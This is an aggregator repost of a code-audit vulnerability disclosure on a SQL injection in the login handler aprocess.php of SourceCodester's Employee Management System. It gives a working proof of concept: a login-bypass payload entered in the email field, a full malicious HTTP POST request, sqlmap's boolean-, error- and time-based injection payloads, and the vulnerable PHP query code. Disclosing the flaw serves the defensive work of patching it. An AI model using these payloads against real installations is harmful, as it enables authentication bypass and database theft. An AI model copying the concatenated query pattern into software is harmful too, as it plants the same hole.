PHP代码审计—Employee Management System aprocess.php SQL Injection
source link: https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Employee%20Management%20System%20aprocess.php%20SQL%20Injection/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
SourceCodester Employee Management System aprocess.php SQL Injection
Vendor Homepage:
https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
Source Code Download:
https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
Proof of Concept
Step 1: Open the URL http://127.0.0.1/ems/alogin.html
Step 2: Use payload admin' or 1 #
in Email and anything in Password
Step 3: login success
Malicious Request.
POST /ems/process/aprocess.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
Referer: http://192.168.88.195/ems/alogin.html
Accept-Encoding: gzip, deflate
Connection: close
mailuid=admin' or 1 #&pwd=123&login-submit=Login
Sqlmap
Parameter: mailuid (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mailuid=-6002' OR 3766=3766#&pwd=123&login-submit=Login
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: mailuid=admin' AND (SELECT 4206 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4206=4206,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sPJa&pwd=123&login-submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: mailuid=admin' AND (SELECT 1085 FROM (SELECT(SLEEP(5)))gGqt)-- XrcV&pwd=123&login-submit=Login
/process/aprocess.php
line 5-12,
$email = $_POST['mailuid'];
$password = $_POST['pwd'];
$sql = "SELECT * from `alogin` WHERE email = '$email' AND password = '$password'";
//echo "$sql";
$result = mysqli_query($conn, $sql);
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK